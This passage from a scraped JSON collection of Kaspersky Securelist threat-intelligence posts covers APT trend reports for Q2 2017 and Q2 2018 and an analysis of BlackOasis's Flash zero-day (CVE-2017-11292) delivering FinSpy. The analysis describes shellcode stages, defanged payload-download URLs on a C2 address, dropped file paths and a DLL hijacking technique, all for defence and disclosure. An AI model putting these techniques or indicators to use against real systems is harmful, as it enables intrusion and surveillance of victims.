tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. 
The US-CERT released a [warning](<https://www.us-cert.gov/ncas/analysis-reports/AR18-165A>) in June about a new version of Manuscrypt they call TYPEFRAME.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154452/180709-APT-Trends-report-Q2-2018-1.png>)\n\n_US-CERT alert on Manuscrypt/TYPEFRAME malware used by Lazarus_\n\nEven if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.\n\nPossibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft [was found](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group's capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day [announced](<http://blogs.360.cn/blog/cve-2018-8174-en/>) by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>).\n\nThe overlaps between Scarcruft and Darkhotel go back to 2016 when we [discovered](<https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/>) Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. 
We were later able to separate these as follows:\n\nOperation | Exploit | Actor \n---|---|--- \nDaybreak | CVE-2016-4171 | DarkHotel \nErebus | CVE-2016-4117 | Scarcruft \n \nDarkHotel's Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft's Operation Erebus focused primarily on South Korea.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154503/180709-APT-Trends-report-Q2-2018-2.png>)\n\nAnalysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker [was using URLMoniker](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim's computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: \"[The King is Dead. Long Live the King!](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)\".\n\nWe also observed some relatively quiet groups coming back with new activity. A noteworthy example is [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.\n\nStill, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. 
It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an [analysis](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) on the EXIF to C2 mechanism used by this malware.\n\nThis campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.\n\n## **Activity of well-known groups**\n\nIt seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.\n\nThere is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we [observed](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>) new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154509/180709-APT-Trends-report-Q2-2018-3.png>)\n\nBut even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. 
Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.\n\nOne of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since perhaps as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.\n\n## **Newcomers and comebacks**\n\nEvery now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.\n\nOne good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.\n\nFollowing the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.\n\nWe also discovered a new low-sophistication set of activity we call Perfanly, which we couldn't attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. 
It uses custom multistage droppers as well as freely available tools such as Metasploit.\n\nBetween June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.\n\n## **Final thoughts**\n\nThe combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the 'Chinese-speaking umbrella', as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.\n\nThe intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.\n\nOne interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries \u2013 some related to new relations with North Korea \u2013 held in Mongolia, and to the country's new role in the region.\n\nThere were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. 
Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking [our latest analysis](<https://securelist.com/energetic-bear-crouching-yeti/85345/>) on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.\n\nTo recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn't believe this was an important issue.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kaspersky.com.", "cvss3": {}, "published": "2018-07-10T10:00:22", "type": "securelist", "title": "APT Trends Report Q2 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-4117", "CVE-2016-4171", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-07-10T10:00:22", "id": "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "href": "https://securelist.com/apt-trends-report-q2-2018/86487/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-16T15:16:55", "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. 
As soon as we find new vulnerabilities, we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We reported the bug to Adobe, who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today:\n\n[](<https://securelist.com/files/2017/10/cve_2017_11292_credits.png>)So far only one attack has been observed in our customer base, leading us to believe the number of attacks is minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". We are also highly confident that BlackOasis was responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi-scanner system on May 8, 2016. 
The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. Some lure documents used in these attacks are shown below:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-1.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-2.png>)Decoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. 
Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-3.png>)[](<https://securelist.com/files/2017/10/171016-blackoasis-4.png>)**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-5.png>)**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-6.png>)NOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-7.png>)**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. 
This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, including a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-8.png>)**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE will look like the following:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-9.png>)**Unpacked PCODE**\n\nAfter unpacking, the virtual machine PCODE is then decrypted:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-10.png>)**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-11.png>)**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in the parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legitimate binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n[](<https://securelist.com/files/2017/10/171016-blackoasis-12.png>)**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. 
Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. 
Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero-day exploits such as the ones described here, will continue to grow.\n\nWhat does this mean for everyone, and how can one defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are also protected against this threat by one of the following detections:\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. 
Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "cvss3": {}, "published": "2017-10-16T14:28:47", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "modified": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. 
We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. 
The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long-running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT concludes that the initial intent was destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence_ assessment that the attacks may share traits with the BlackEnergy actors. \n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-2.png>)\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. 
BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. 
A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. 
Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. 
While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. 
At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. 
Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. 
In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry about because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability & Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in the safe environment of a sandbox. 
